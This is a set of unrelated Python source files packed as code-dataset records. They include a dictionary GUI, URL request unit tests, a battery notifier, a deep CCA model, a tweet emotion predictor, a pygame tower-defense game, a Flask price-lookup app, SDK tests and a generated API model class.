self.ant_label.setText(_translate(\"MainWindow\", \"Antonyms\"))\r\n self.phn_text_label.setText(_translate(\"MainWindow\", \"Phonetics\"))\r\n self.phn_label.setText(_translate(\"MainWindow\", \"Phonetics\"))\r\n self.sent_label.setText(_translate(\"MainWindow\", \"Sentences\"))\r\n self.sent_text_label.setText(_translate(\"MainWindow\", \"Sentences\"))\r\n self.search_bttn.setText(_translate(\"MainWindow\", \"Search\"))\r\n self.save_bttn.setText(_translate(\"MainWindow\", \"Save this word\"))\r\n self.close_bttn.setText(_translate(\"MainWindow\", \"Close\"))\r\n\r\n def fetch_all_info(self):\r\n try:\r\n user_word=self.word_line_edit.text()\r\n definition=Definition.search_word(self)\r\n synonym=Synonyms.search_synonym(self)\r\n antonym=Antonyms.search_antonym(self)\r\n sentence=Sentences.get_sentences(self)\r\n phonetic=Phonetics.search_phonetics(self)\r\n \r\n except Exception as e:\r\n print('Something went wrong , Please try again !! ')\r\n \r\n return user_word,definition,synonym,antonym ,phonetic,sentence\r\n\r\n def save_words(self):\r\n \r\n word_data=self.fetch_all_info()\r\n user_word=str(word_data[0]).replace(\"'\",\"\")\r\n definition=str(word_data[1]).replace(\"'\",\"\")\r\n synonym=str(word_data[2]).replace(\"'\",\"\")\r\n antonym=str(word_data[3]).replace(\"'\",\"\")\r\n phonetics=str(word_data[4]).replace(\"'\",\"\")\r\n sentences=str(word_data[5]).replace(\"'\",\"\")\r\n\r\n db=DbConnect()\r\n db.insert_word(user_word,definition,synonym,antonym ,phonetics,sentences)\r\n print(\"This word is inserted\")\r\n #db.fetch_all()\r\n \r\n\r\n\r\n","sub_path":"Word Wall Application/fetchAll.py","file_name":"fetchAll.py","file_ext":"py","file_size_in_byte":8121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"113406371","text":"#\n# Copyright (C) 2012-2013 Craig Hobbs\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n#\n\nimport sys\nimport unittest\n\n# Replace urllib2 with mock\nfrom . import charcoal_compat\nsys.modules['charcoal.compat'] = charcoal_compat\n\nfrom charcoal.url_request_resource import UrlRequestResourceFactory # noqa\n\n# Restore urllib2\ndel sys.modules['charcoal.compat']\n\n\nclass TestUrlRequestResource(unittest.TestCase):\n\n def test_url_request_resource(self):\n\n # Create the resource type\n factory = UrlRequestResourceFactory()\n\n request = factory.open('url=http://myhost.com/mypath/')\n\n # GET (trailing slash, append to URL)\n response = request.send('myurl')\n self.assertEqual(response, '''\\\nhttp://myhost.com/mypath/myurl''')\n\n # GET (trailing slash, append to URL - non-default timeout)\n response = request.send('myurl', timeout=10)\n self.assertEqual(response, '''\\\nhttp://myhost.com/mypath/myurl''')\n\n # GET (trailing slash, replace URL)\n response = request.send('/myurl')\n self.assertEqual(response, '''\\\nhttp://myhost.com/myurl''')\n\n # GET (trailing slash, no URL)\n response = request.send()\n self.assertEqual(response, '''\\\nhttp://myhost.com/mypath/''')\n\n # GET (trailing slash, params only)\n response = request.send('?a=1&b=2')\n self.assertEqual(response, '''\\\nhttp://myhost.com/mypath/?a=1&b=2''')\n\n # Close the request\n factory.close(request)\n\n request = factory.open('url=http://myhost.com/mypath/myresource')\n\n # GET (no trailing slash, replace resource)\n response = request.send('myurl')\n self.assertEqual(response, '''\\\nhttp://myhost.com/mypath/myurl''')\n\n # GET (no trailing slash, replace URL)\n response = request.send('/myurl')\n self.assertEqual(response, '''\\\nhttp://myhost.com/myurl''')\n\n # GET (no trailing slash, empty URL)\n response = request.send()\n self.assertEqual(response, '''\\\nhttp://myhost.com/mypath/myresource''')\n\n # GET (no trailing slash, params only)\n response = request.send('?a=1&b=2')\n self.assertEqual(response, '''\\\nhttp://myhost.com/mypath/myresource?a=1&b=2''')\n\n # Close the request\n factory.close(request)\n\n request = factory.open('url=http://myhost.com/mypath/')\n\n # POST\n request.add_data('My POST data.')\n response = request.send()\n self.assertEqual(response, '''\\\nhttp://myhost.com/mypath/\nMy POST data.''')\n\n # POST with headers\n request.add_data('My other POST data.')\n request.add_header('MyHeader', 'MyValue')\n request.add_unredirected_header('MyUnredirectedHeader', 'MyUnredirectedValue')\n response = request.send()\n self.assertEqual(response, '''\\\nhttp://myhost.com/mypath/\n('MyHeader', 'MyValue')\n('MyUnredirectedHeader', 'MyUnredirectedValue')\nMy other POST data.''')\n\n # Close the resource\n factory.close(request)\n\n def test_url_request_resource_propertyDelimiterEscape(self):\n\n factory = UrlRequestResourceFactory()\n request = factory.open('url=http://myhost.com/mypath/;username=user;password=a\\;bc;')\n self.assertEqual(request.url, 'http://myhost.com/mypath/')\n self.assertEqual(request.properties['username'], 'user')\n self.assertEqual(request.properties['password'], 'a;bc')\n","sub_path":"charcoal/tests/test_url_request_resource.py","file_name":"test_url_request_resource.py","file_ext":"py","file_size_in_byte":4410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"310185929","text":"#this is the python file\n#pip for windows and pip3 for any linux ditro or mac\nfrom psutil import sensors_battery#if there is an error Moduel not found then run pip/pip3 install psutil in terminal\nfrom playsound import playsound as p#if there is an error Moduel not found then run pip/pip3 install playsound in terminal\nfrom notify2 import init , Notification#if there is an error Moduel not found then run pip/pip3 install notify2 in terminal\ninit(\"H\")\ndef notify(title , body , icon=\"\"):\n Notification(title , body , icon).show()\nwhile True:\n bettery = sensors_battery() \n percent = int(bettery.percent)\n plugged = bettery.power_plugged\n if percent == 10:#10% battery is low you can write your percent instead of 10\n if plugged == False:\n notify(\"Battery is low\" , \"I am hungry\")\n p(\"/home/devyansh/Documents/My work/Python/My exprement/galaxy_low_battery.mp3\")#instead of /home/devyansh/Documents/My work/Python/My exprement/galaxy_low_battery.mp3 give the path of your ringtone\n elif percent == 100:#100% battery is full you can write your percent instead of 100\n if plugged == True:\n notify(\"Battery is full\" , \"I am getting fat\")\n p(\"/home/devyansh/Documents/My work/Python/My exprement/galaxy_low_battery.mp3\")#instead of /home/devyansh/Documents/My work/Python/My exprement/galaxy_low_battery.mp3 give the path of your ringtone\n","sub_path":"README.py","file_name":"README.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"370180110","text":"import torch\n\nfrom ..objectives import inv_sqrtm\nfrom ._dcca import DCCA\n\n\nclass DCCA_NOI(DCCA):\n \"\"\"\n A class used to fit a DCCA model by non-linear orthogonal iterations\n\n\n References\n ----------\n Wang, Weiran, et al. \"Stochastic optimization for deep CCA via nonlinear orthogonal iterations.\" 2015 53rd Annual Allerton Conference on Communication, Control, and Computing (Allerton). IEEE, 2015.\n\n \"\"\"\n\n def __init__(\n self,\n latent_dimensions: int,\n N: int,\n encoders=None,\n r: float = 0,\n rho: float = 0.2,\n eps: float = 1e-9,\n shared_target: bool = False,\n **kwargs,\n ):\n super().__init__(\n latent_dimensions=latent_dimensions,\n encoders=encoders,\n r=r,\n eps=eps,\n **kwargs,\n )\n self.N = N\n self.covs = None\n if rho < 0 or rho > 1:\n raise ValueError(f\"rho should be between 0 and 1. rho={rho}\")\n self.eps = eps\n self.rho = rho\n self.shared_target = shared_target\n self.mse = torch.nn.MSELoss(reduction=\"sum\")\n self.rand = torch.rand(N, self.latent_dimensions)\n\n def loss(self, views, **kwargs):\n z = self(views)\n z_copy = [z_.detach().clone() for z_ in z]\n self._update_covariances(z_copy, train=self.training)\n covariance_inv = [inv_sqrtm(cov, self.eps) for cov in self.covs]\n preds = [z_ @ covariance_inv[i] for i, z_ in enumerate(z_copy)]\n loss = self.mse(z[0], preds[1]) + self.mse(z[1], preds[0])\n self.covs = [cov.detach() for cov in self.covs]\n return {\"objective\": loss}\n\n def _update_covariances(self, z, train=True):\n b = z[0].shape[0]\n batch_covs = [self.N * z_.T @ z_ / b for z_ in z]\n if train:\n if self.covs is not None:\n self.covs = [\n self.rho * self.covs[i] + (1 - self.rho) * batch_cov\n for i, batch_cov in enumerate(batch_covs)\n ]\n else:\n self.covs = batch_covs\n # pytorch-lightning runs validation once so this just fixes the bug\n elif self.covs is None:\n self.covs = batch_covs\n","sub_path":"cca_zoo/deep/_discriminative/_dcca_noi.py","file_name":"_dcca_noi.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"246478238","text":"import numpy as np\nimport pandas as pd\nimport pickle\n\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras_preprocessing.text import Tokenizer\n\n\ndef get_sequences(tokenizer, x, sentence_length):\n sequences = tokenizer.texts_to_sequences(x)\n\n return pad_sequences(sequences, maxlen=sentence_length)\n\n\ndef fix_arr(x):\n return np.append([x[0]], list(x[1:]), axis=0)\n\n\ndef main():\n text_tweets = pd.read_csv('../data/tweets_data.csv', delimiter='\\t')\n\n X = text_tweets.Text.values\n\n print('All data has been loaded')\n\n SENTENCE_LENGTH = 167\n NUM = 100000\n\n tokenizer = Tokenizer(num_words=NUM)\n tokenizer.fit_on_texts(X)\n\n X_seq = get_sequences(tokenizer, X, SENTENCE_LENGTH)\n\n print('Input data has been tokenized')\n\n with open('../output/model.pkl', 'rb') as file:\n model = pickle.load(file)\n\n model.load_weights('../output/cnn-frozen-embeddings-37.hdf5')\n\n print('Model has been loaded')\n\n classes = np.array(['anger', 'happiness', 'love', 'neutral', 'sadness'])\n predictions = model.predict(X_seq)\n predicted_ix = np.apply_along_axis(lambda x: np.argmax(x), 1, predictions)\n\n text_tweets['class_prediction'] = pd.Series(np.apply_along_axis(lambda x: classes[x], 0, predicted_ix))\n\n text_tweets.to_csv('../output/predictions.csv', sep='\\t')\n\n print('Predictions have been saved')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"twhelp/scripts/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"307878425","text":"import pygame\nfrom enemy import EnemyGroup\nfrom tower import TowerGroup\n\nimport os\nfrom settings import WIN_WIDTH, WIN_HEIGHT, FPS\n\n# initialization\npygame.init()\n# load image\nBACKGROUND_IMAGE = pygame.image.load(os.path.join(\"images\", \"Map.png\"))\nHP_IMAGE = pygame.image.load(os.path.join(\"images\", \"hp.png\"))\nHP_GRAY_IMAGE = pygame.image.load(os.path.join(\"images\", \"hp_gray.png\"))\n# set the title and icon\npygame.display.set_caption(\"My TD game\")\n\n\nclass Game:\n def __init__(self):\n self.win = pygame.display.set_mode((WIN_WIDTH, WIN_HEIGHT))\n self.bg_image = pygame.transform.scale(BACKGROUND_IMAGE, (WIN_WIDTH, WIN_HEIGHT))\n self.hp_images = [pygame.transform.scale(HP_IMAGE, (40, 40)),\n pygame.transform.scale(HP_GRAY_IMAGE, (40, 40))]\n self.enemies = EnemyGroup()\n self.towers = TowerGroup()\n self.base = pygame.Rect(430, 90, 195, 130)\n\n @staticmethod\n def select(group, x, y):\n \"\"\"\n Bonus) If the item is clicked. change the state of whether the tower is selected. (( tower.is_clicked(), tower.get_selected()\n :param group: Group()\n :param x: mouse pos x\n :param y: mouse pos y\n :return: None\n \"\"\"\n for tower in group.get(): # get one tower each loop\n if tower.is_clicked(x, y): # detect if tower.is_clicked\n tower.get_selected(True)\n else:\n tower.get_selected(False)\n\n\n def collide_base(self, enemy):\n \"\"\"\n Return True if the enemy collide with base.\n :param enemy: class Enemy()\n :return: Bool\n \"\"\"\n en_x, en_y = enemy.get_pos()\n x, y = self.base.center\n width, height = self.base.w, self.base.h\n if x - width//2 < en_x < x + width//2 and y - height//2 < en_y < y + height//2:\n return True\n return False\n\n def draw(self):\n \"\"\"\n Draw everything in this method.\n :return: None\n \"\"\"\n # draw background\n self.win.blit(self.bg_image, (0, 0))\n # draw enemy\n for en in self.enemies.get():\n en.draw(self.win)\n # draw tower\n for tw in self.towers.get():\n tw.draw(self.win)\n\n def game_run(self):\n run = True\n clock = pygame.time.Clock()\n while run:\n clock.tick(FPS)\n # event loop\n x, y = pygame.mouse.get_pos()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False # quit game\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_n and self.enemies.is_empty():\n self.enemies.add(3) # 3 enemy is ready for the next wave\n if event.type == pygame.MOUSEBUTTONDOWN:\n self.select(self.towers, x, y)\n\n # tower loop\n for tw in self.towers.get():\n tw.attack(self.enemies)\n\n # enemy loop\n self.enemies.campaign() # let the enemy go on an expidition\n for en in self.enemies.get():\n en.move()\n if en.died():\n self.enemies.retreat(en)\n # delete the object when it reach the base\n if self.collide_base(en):\n self.enemies.retreat(en)\n\n # draw everything\n self.draw()\n pygame.display.update()\n pygame.quit()\n\n\nif __name__ == '__main__':\n covid_game = Game()\n covid_game.game_run()","sub_path":"F34086074-Lab4/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"478397225","text":"from flask import Flask, render_template, request, url_for, redirect\nimport pandas as pd\n\n\napp = Flask(__name__)\nDATABASE_PATH = '/home/ubuntu/nei_filtered_sj.csv'\nDF = pd.read_csv(DATABASE_PATH)\nZIPS = DF.postal_code.unique()\n\ndef get_panda_data(zip,by):\n df = pd.read_csv(DATABASE_PATH)\n df = df.loc[df['postal_code'] == int(zip)]\n df = df[['zpid','address','city','postal_code','price','price_sqft','sale_price_sign','pricepersqft_sign','yearSold','lat','lon','url']].copy()\n\n if(by=='price'):\n df = df.sort_values(by='sale_price_sign', ascending=True).head(10)\n else:\n df = df.sort_values(by='pricepersqft_sign', ascending=True).head(10)\n tags_html = df.to_html(escape=False)\n return tags_html\n\n@app.route('/index')\n@app.route('/')\ndef index():\n return render_template(\"dropdown.html\", postal_codes=ZIPS)\n\n@app.route('/show', methods=['GET', 'POST'])\ndef login():\n if request.method == \"POST\":\n zip = request.form.get(\"postal_code\", None)\n by = request.form.get(\"by\", None)\n if zip!=\"0\":\n html_data = get_panda_data(zip,by)\n return render_template(\"dropdown2.html\", postal_codes=ZIPS, postal_code = zip, html_data = html_data)\n return render_template(\"dropdown2.html\", postal_codes=ZIPS)\n\n\nif __name__ == '__main__':\n app.run(debug=True, host=\"0.0.0.0\", port=80)\n","sub_path":"dropdown.py","file_name":"dropdown.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"582800771","text":"import unittest\nimport responses\n\nimport pillarsdk\nimport pillarsdk.exceptions as sdk_exceptions\n\nmock = responses.RequestsMock(assert_all_requests_are_fired=True)\n\n\nclass ProjectsTests(unittest.TestCase):\n def setUp(self):\n self.endpoint = 'http://localhost:12345'\n self.api = pillarsdk.Api(\n endpoint=self.endpoint,\n username='',\n password='',\n token='jemoeder',\n )\n\n @mock.activate\n def test_find_project_happy(self):\n project_id = 24 * 'a'\n\n # Finding the existing project\n mock.add(responses.GET,\n '%s/projects' % self.endpoint,\n json={'_items': [{\n '_id': project_id,\n '_etag': 'awesome-etag',\n 'name': 'test-project'}\n ]})\n\n proj = pillarsdk.Project.find_one({'_id': project_id}, api=self.api)\n self.assertEqual(project_id, proj['_id'])\n\n @mock.activate\n def test_find_project_unhappy_empty_response(self):\n project_id = 24 * 'a'\n\n # Finding the existing project\n mock.add(responses.GET,\n '%s/projects' % self.endpoint,\n json={})\n\n self.assertRaises(sdk_exceptions.ResourceNotFound,\n pillarsdk.Project.find_one,\n {'_id': project_id}, api=self.api)\n\n @mock.activate\n def test_find_project_unhappy_404_response(self):\n project_id = 24 * 'a'\n\n # Finding the existing project\n mock.add(responses.GET,\n '%s/projects' % self.endpoint,\n json={'_items': [{\n '_id': project_id,\n '_etag': 'awesome-etag',\n 'name': 'test-project'}\n ]},\n status=404)\n\n self.assertRaises(sdk_exceptions.ResourceNotFound,\n pillarsdk.Project.find_one,\n {'_id': project_id}, api=self.api)\n","sub_path":"tests/test_projects.py","file_name":"test_projects.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"23873116","text":"# coding: utf-8\n\n\"\"\"\n Container Security APIs\n\n All features of the Container Security are available through REST APIs.
Access support information at www.qualys.com/support/

Permissions:
User must have the Container module enabled
User must have API ACCESS permission # noqa: E501\n\n The version of the OpenAPI document: 1.0.0\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom qualys_cs_api.configuration import Configuration\n\n\nclass RegistryResponse(object):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n openapi_types = {\n 'aws_account_id': 'str',\n 'aws_region': 'str',\n 'created': 'str',\n 'docker_hub_org': 'str',\n 'last_scanned': 'str',\n 'provider_type': 'str',\n 'registry_type': 'str',\n 'registry_uri': 'str',\n 'registry_uuid': 'str',\n 'repo_count': 'int',\n 'schedule_status_list': 'dict(str, int)',\n 'total_images': 'int',\n 'total_scanned_images': 'int',\n 'total_vulnerable_images': 'int',\n 'updated': 'str'\n }\n\n attribute_map = {\n 'aws_account_id': 'awsAccountId',\n 'aws_region': 'awsRegion',\n 'created': 'created',\n 'docker_hub_org': 'dockerHubOrg',\n 'last_scanned': 'lastScanned',\n 'provider_type': 'providerType',\n 'registry_type': 'registryType',\n 'registry_uri': 'registryUri',\n 'registry_uuid': 'registryUuid',\n 'repo_count': 'repoCount',\n 'schedule_status_list': 'scheduleStatusList',\n 'total_images': 'totalImages',\n 'total_scanned_images': 'totalScannedImages',\n 'total_vulnerable_images': 'totalVulnerableImages',\n 'updated': 'updated'\n }\n\n def __init__(self, aws_account_id=None, aws_region=None, created=None, docker_hub_org=None, last_scanned=None, provider_type=None, registry_type=None, registry_uri=None, registry_uuid=None, repo_count=None, schedule_status_list=None, total_images=None, total_scanned_images=None, total_vulnerable_images=None, updated=None, local_vars_configuration=None): # noqa: E501\n \"\"\"RegistryResponse - a model defined in OpenAPI\"\"\" # noqa: E501\n if local_vars_configuration is None:\n local_vars_configuration = Configuration()\n self.local_vars_configuration = local_vars_configuration\n\n self._aws_account_id = None\n self._aws_region = None\n self._created = None\n self._docker_hub_org = None\n self._last_scanned = None\n self._provider_type = None\n self._registry_type = None\n self._registry_uri = None\n self._registry_uuid = None\n self._repo_count = None\n self._schedule_status_list = None\n self._total_images = None\n self._total_scanned_images = None\n self._total_vulnerable_images = None\n self._updated = None\n self.discriminator = None\n\n if aws_account_id is not None:\n self.aws_account_id = aws_account_id\n if aws_region is not None:\n self.aws_region = aws_region\n if created is not None:\n self.created = created\n if docker_hub_org is not None:\n self.docker_hub_org = docker_hub_org\n if last_scanned is not None:\n self.last_scanned = last_scanned\n if provider_type is not None:\n self.provider_type = provider_type\n if registry_type is not None:\n self.registry_type = registry_type\n if registry_uri is not None:\n self.registry_uri = registry_uri\n if registry_uuid is not None:\n self.registry_uuid = registry_uuid\n if repo_count is not None:\n self.repo_count = repo_count\n if schedule_status_list is not None:\n self.schedule_status_list = schedule_status_list\n if total_images is not None:\n self.total_images = total_images\n if total_scanned_images is not None:\n self.total_scanned_images = total_scanned_images\n if total_vulnerable_images is not None:\n self.total_vulnerable_images = total_vulnerable_images\n if updated is not None:\n self.updated = updated\n\n @property\n def aws_account_id(self):\n \"\"\"Gets the aws_account_id of this RegistryResponse. # noqa: E501\n\n\n :return: The aws_account_id of this RegistryResponse. # noqa: E501\n :rtype: str\n \"\"\"\n return self._aws_account_id\n\n @aws_account_id.setter\n def aws_account_id(self, aws_account_id):\n \"\"\"Sets the aws_account_id of this RegistryResponse.\n\n\n :param aws_account_id: The aws_account_id of this RegistryResponse. # noqa: E501\n :type: str\n \"\"\"\n\n self._aws_account_id = aws_account_id\n\n @property\n def aws_region(self):\n \"\"\"Gets the aws_region of this RegistryResponse. # noqa: E501\n\n\n :return: The aws_region of this RegistryResponse. # noqa: E501\n :rtype: str\n \"\"\"\n return self._aws_region\n\n @aws_region.setter\n def aws_region(self, aws_region):\n \"\"\"Sets the aws_region of this RegistryResponse.\n\n\n :param aws_region: The aws_region of this RegistryResponse. # noqa: E501\n :type: str\n \"\"\"\n\n self._aws_region = aws_region\n\n @property\n def created(self):\n \"\"\"Gets the created of this RegistryResponse. # noqa: E501\n\n\n :return: The created of this RegistryResponse. # noqa: E501\n :rtype: str\n \"\"\"\n return self._created\n\n @created.setter\n def created(self, created):\n \"\"\"Sets the created of this RegistryResponse.\n\n\n :param created: The created of this RegistryResponse. # noqa: E501\n :type: str\n \"\"\"\n\n self._created = created\n\n @property\n def docker_hub_org(self):\n \"\"\"Gets the docker_hub_org of this RegistryResponse. # noqa: E501\n\n\n :return: The docker_hub_org of this RegistryResponse. # noqa: E501\n :rtype: str\n \"\"\"\n return self._docker_hub_org\n\n @docker_hub_org.setter\n def docker_hub_org(self, docker_hub_org):\n \"\"\"Sets the docker_hub_org of this RegistryResponse.\n\n\n :param docker_hub_org: The docker_hub_org of this RegistryResponse. # noqa: E501\n :type: str\n \"\"\"\n\n self._docker_hub_org = docker_hub_org\n\n @property\n def last_scanned(self):\n \"\"\"Gets the last_scanned of this RegistryResponse. # noqa: E501\n\n\n :return: The last_scanned of this RegistryResponse. # noqa: E501\n :rtype: str\n \"\"\"\n return self._last_scanned\n\n @last_scanned.setter\n def last_scanned(self, last_scanned):\n \"\"\"Sets the last_scanned of this RegistryResponse.\n\n\n :param last_scanned: The last_scanned of this RegistryResponse. # noqa: E501\n :type: str\n \"\"\"\n\n self._last_scanned = last_scanned\n\n @property\n def provider_type(self):\n \"\"\"Gets the provider_type of this RegistryResponse. # noqa: E501\n\n\n :return: The provider_type of this RegistryResponse. # noqa: E501\n :rtype: str\n \"\"\"\n return self._provider_type\n\n @provider_type.setter\n def provider_type(self, provider_type):\n \"\"\"Sets the provider_type of this RegistryResponse.\n\n\n :param provider_type: The provider_type of this RegistryResponse. # noqa: E501\n :type: str\n \"\"\"\n allowed_values = [\"DockerHub\", \"AWS\"] # noqa: E501\n if self.local_vars_configuration.client_side_validation and provider_type not in allowed_values: # noqa: E501\n raise ValueError(\n \"Invalid value for `provider_type` ({0}), must be one of {1}\" # noqa: E501\n .format(provider_type, allowed_values)\n )\n\n self._provider_type = provider_type\n\n @property\n def registry_type(self):\n \"\"\"Gets the registry_type of this RegistryResponse. # noqa: E501\n\n\n :return: The registry_type of this RegistryResponse. # noqa: E501\n :rtype: str\n \"\"\"\n return self._registry_type\n\n @registry_type.setter\n def registry_type(self, registry_type):\n \"\"\"Sets the registry_type of this RegistryResponse.\n\n\n :param registry_type: The registry_type of this RegistryResponse. # noqa: E501\n :type: str\n \"\"\"\n allowed_values = [\"V2_PRIVATE\", \"V2\", \"DockerHub\", \"AWS\", \"Azure\"] # noqa: E501\n if self.local_vars_configuration.client_side_validation and registry_type not in allowed_values: # noqa: E501\n raise ValueError(\n \"Invalid value for `registry_type` ({0}), must be one of {1}\" # noqa: E501\n .format(registry_type, allowed_values)\n )\n\n self._registry_type = registry_type\n\n @property\n def registry_uri(self):\n \"\"\"Gets the registry_uri of this RegistryResponse. # noqa: E501\n\n\n :return: The registry_uri of this RegistryResponse. # noqa: E501\n :rtype: str\n \"\"\"\n return self._registry_uri\n\n @registry_uri.setter\n def registry_uri(self, registry_uri):\n \"\"\"Sets the registry_uri of this RegistryResponse.\n\n\n :param registry_uri: The registry_uri of this RegistryResponse. # noqa: E501\n :type: str\n \"\"\"\n\n self._registry_uri = registry_uri\n\n @property\n def registry_uuid(self):\n \"\"\"Gets the registry_uuid of this RegistryResponse. # noqa: E501\n\n\n :return: The registry_uuid of this RegistryResponse. # noqa: E501\n :rtype: str\n \"\"\"\n return self._registry_uuid\n\n @registry_uuid.setter\n def registry_uuid(self, registry_uuid):\n \"\"\"Sets the registry_uuid of this RegistryResponse.\n\n\n :param registry_uuid: The registry_uuid of this RegistryResponse. # noqa: E501\n :type: str\n \"\"\"\n\n self._registry_uuid = registry_uuid\n\n @property\n def repo_count(self):\n \"\"\"Gets the repo_count of this RegistryResponse. # noqa: E501\n\n\n :return: The repo_count of this RegistryResponse. # noqa: E501\n :rtype: int\n \"\"\"\n return self._repo_count\n\n @repo_count.setter\n def repo_count(self, repo_count):\n \"\"\"Sets the repo_count of this RegistryResponse.\n\n\n :param repo_count: The repo_count of this RegistryResponse. # noqa: E501\n :type: int\n \"\"\"\n\n self._repo_count = repo_count\n\n @property\n def schedule_status_list(self):\n \"\"\"Gets the schedule_status_list of this RegistryResponse. # noqa: E501\n\n\n :return: The schedule_status_list of this RegistryResponse. # noqa: E501\n :rtype: dict(str, int)\n \"\"\"\n return self._schedule_status_list\n\n @schedule_status_list.setter\n def schedule_status_list(self, schedule_status_list):\n \"\"\"Sets the schedule_status_list of this RegistryResponse.\n\n\n :param schedule_status_list: The schedule_status_list of this RegistryResponse. # noqa: E501\n :type: dict(str, int)\n \"\"\"\n\n self._schedule_status_list = schedule_status_list\n\n @property\n def total_images(self):\n \"\"\"Gets the total_images of this RegistryResponse. # noqa: E501\n\n\n :return: The total_images of this RegistryResponse. # noqa: E501\n :rtype: int\n \"\"\"\n return self._total_images\n\n @total_images.setter\n def total_images(self, total_images):\n \"\"\"Sets the total_images of this RegistryResponse.\n\n\n :param total_images: The total_images of this RegistryResponse. # noqa: E501\n :type: int\n \"\"\"\n\n self._total_images = total_images\n\n @property\n def total_scanned_images(self):\n \"\"\"Gets the total_scanned_images of this RegistryResponse. # noqa: E501\n\n\n :return: The total_scanned_images of this RegistryResponse. # noqa: E501\n :rtype: int\n \"\"\"\n return self._total_scanned_images\n\n @total_scanned_images.setter\n def total_scanned_images(self, total_scanned_images):\n \"\"\"Sets the total_scanned_images of this RegistryResponse.\n\n\n :param total_scanned_images: The total_scanned_images of this RegistryResponse. # noqa: E501\n :type: int\n \"\"\"\n\n self._total_scanned_images = total_scanned_images\n\n @property\n def total_vulnerable_images(self):\n \"\"\"Gets the total_vulnerable_images of this RegistryResponse. # noqa: E501\n\n\n :return: The total_vulnerable_images of this RegistryResponse. # noqa: E501\n :rtype: int\n \"\"\"\n return self._total_vulnerable_images\n\n @total_vulnerable_images.setter\n def total_vulnerable_images(self, total_vulnerable_images):\n \"\"\"Sets the total_vulnerable_images of this RegistryResponse.\n\n\n :param total_vulnerable_images: The total_vulnerable_images of this RegistryResponse. # noqa: E501\n :type: int\n \"\"\"\n\n self._total_vulnerable_images = total_vulnerable_images\n\n @property\n def updated(self):\n \"\"\"Gets the updated of this RegistryResponse. # noqa: E501\n\n\n :return: The updated of this RegistryResponse. # noqa: E501\n :rtype: str\n \"\"\"\n return self._updated\n\n @updated.setter\n def updated(self, updated):\n \"\"\"Sets the updated of this RegistryResponse.\n\n\n :param updated: The updated of this RegistryResponse. # noqa: E501\n :type: str\n \"\"\"\n\n self._updated = updated\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, RegistryResponse):\n return False\n\n return self.to_dict() == other.to_dict()\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n if not isinstance(other, RegistryResponse):\n return True\n\n return self.to_dict() != other.to_dict()\n","sub_path":"qualys_cs_api/models/registry_response.py","file_name":"registry_response.py","file_ext":"py","file_size_in_byte":15329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"80082521","text":"from modules.base_module import Module\n\nclass_name = \"UserConfirm\"\n\n\nclass UserConfirm(Module):\n prefix = \"cf\"\n\n def __init__(self, server):\n self.server = server\n self.commands = {\"uc\": self.user_confirm,\n \"uca\": self.user_confirm_approve,\n \"ucd\": self.user_confirm_decline}\n\n def 